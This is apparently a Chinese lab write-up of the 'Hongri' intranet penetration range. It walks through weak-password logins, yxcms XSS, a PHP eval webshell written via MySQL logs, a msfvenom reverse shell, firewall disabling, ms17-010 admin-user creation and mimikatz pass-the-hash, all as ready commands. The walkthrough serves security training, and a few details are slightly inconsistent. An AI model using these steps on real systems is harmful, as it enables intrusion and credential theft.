本文主要是介绍红日内网渗透靶场1,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
目录
网络拓扑
环境配置
测试网络连通性
信息收集
漏洞利用
内网信息收集
内网攻击
横向移动
网络拓扑
环境配置
攻击机:kali
kali IP:192.168.123.129
WEB服务器:win7
1. 外网IP:192.168.123.153
2. 内网IP:192.168.52.143
域成员:win 2k3
IP:192.168.52.141
域控服务器:win 2008
网卡IP:192.168.52.138
测试网络连通性
win7 ping win2k 、win2008
图-1
图-2
信息收集
使用nmap对192.168.123.0/24网段进行扫描
nmap -sV -sS -A 192.168.123.0/24
图-3
发现80和3306端口开启,访问页面http://192.168.123.143/发现页面存在大量信息泄露,收集有效信息。
图-4
发现网站底部有一个MySQL数据库连接检测:
图-5
尝试输入用户名和密码root/root,成功连接
图-6
使用御剑扫描目录发现网站备份文件和phpadmin后台管理界面
图-7
打开备份文件发现网站源码,打开robots.txt发现网站CMS为yxcms,访问进入网站首页
图-8
漏洞利用
信息泄露+弱口令
网站泄露后台地址和用户密码,且用户密码为弱口令
图-9
使用泄露的用户名密码成功登录网站后台界面
图-10
yxcms留言本XSS存储型漏洞
利用存储型xss,在前台提交带有XSS代码的留言,
图-11
后台审核成功弹出XSS弹窗
图-12
审核通过之后,前台同样成功弹窗
图-13
yxcms后台任意文件读写漏洞
在后台创建新模板模块创建内容为一句话木马的新模板
图-14
图-15
通过前面的备份文件知道文件保存的目录
http://192.168.123.153/yxcms/protected/apps/default/view/default/
图-16
使用蚁剑成功连接shell
图-17
访问phpmyadmin,尝试使用弱口令root/root,可以登入
图-18
利用日志文件写入木马
1.开启日志功能
set global slow_query_log=’on’;
2.设置日志存储路径
set global general_log_file='C:/phpStudy/WWW/shell.php';
3.执行sql语句,写入一句话木马
select "<?php eval($_POST[cmd]);?>"
成功getshell
图-19
图-20
使用msf反弹shell
生成Windows后门程序反弹shell:
Msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.123.129 lport=6666 -f exe -o shell.exe
图-21
启动监听:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.123.129
set lport 6666
show options
run
图-22
将生成的shell.exe利用蚁剑上传至win7并运行
成功反弹shell
图-23
上线cs
图-24
先创建监听器
图-25
生成后门
图-26
通过蚁剑把exe上传执行,成功上线
图-27
mimikatz工具抓取本机用户名密码:
图-28
图-29
msf上线cs
先记录要返回session的id,msf载入use exploit/windows/local/payload_inject模块,设置payload一定要与cs监听器保持一致:
图-30
lport写的是cs监听端口
lhost写的是cs主机ip
图-31
设置一个监听当msf发起攻击的时候,cs就会上线
图-32
成功上线:
图-33
添加路由到目标环境网络,使得msf能够通过win7路由转发访问192.168.25.0/24网段
run get_local_subnets #查看路由信息
run autoroute -s 192.168.52.0/24 #添加一条路由
图-34
设置代理可以访问内网:
使用msf的socks代理模块
use auxiliary/server/socks
use auxiliary/server/socks_proxy
图-35
文本编辑 vim /etc/proxychains.conf,在最后一行加上socks5代理服务器
Socks5 192.168.123.129 1080
图-36
内网信息收集
使用msf查看补丁信息:run post/windows/gather/enum_patches
图-37
安装软件信息:run post/windows/gather/enum_applications
图-38
查看路由信息:run get_local_subnets
图-39
arp扫描52网段:run post/windows/gather/arp_scanner rhosts=192.168.52.0/24
图-40
关闭防火墙,开启3389进行远程连接
NetSh Advfirewall set allprofiles state off //关闭防火墙
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 //开启3389
使用获得的账户密码登录
图-41
发现当前主机安装了Nmap
直接利用这台主机上的工具来进行内网主机的端口扫描
图-42
进行端口扫描nmap -Pn -sT -p 1-1000 192.168.52.138
图-43
nmap -Pn -sT -p 1-1000 192.168.52.141
图-44
继续使用 nmap 进行主机漏洞扫描,查看是否存漏洞
nmap --script=vuln 192.168.52.128 存在ms17-010 漏洞
图-45
nmap --script=vuln 192.168.52.141
存在ms08-067、ms17-010 漏洞
图-46
内网攻击
漏洞测试是否存在ms17-010:
search ms17-010 //查找ms17-010模块
use auxiliary/scanner/smb/smb_ms17_010 //使用此模块
set rhosts 192.168.52.138 192.168.52.141 //将rhosts参数设置为138 141两个IP
run //运行
图-47
use auxiliary/admin/smb/ms17_010_command //使用该模块
show options //查看配置
set command net user test @qwer1234 /add //添加用户
set rhosts 192.168.52.138 //添加目标IP
run //运行
图-48
set command net localgroup administrators test /add //将test添加到管理组
run //运行
图-49
set command net localgroup administrators //查看管理组成员
run //运行
图-50
set command NetSh Advfirewall set allprofiles state off //关闭防火墙
run //运行
图-51
use exploit/windows/smb/ms17_010_psexec //使用该模块
show options //查看配置
set rhosts 192.168.52.138 //设置目标IP
set payload windows/meterpreter/bind_tcp //选择正向连接
run //运行
图-52
成功拿到域控shell
横向移动
通过pwdump7得到Hash值
图-53
在Win7运行mimikatz哈希传递攻击脚本
mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:GOD /ntlm:2E8B24E00BD703E52CFE327A072006B0
图-53
图-54
这篇关于红日内网渗透靶场1的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!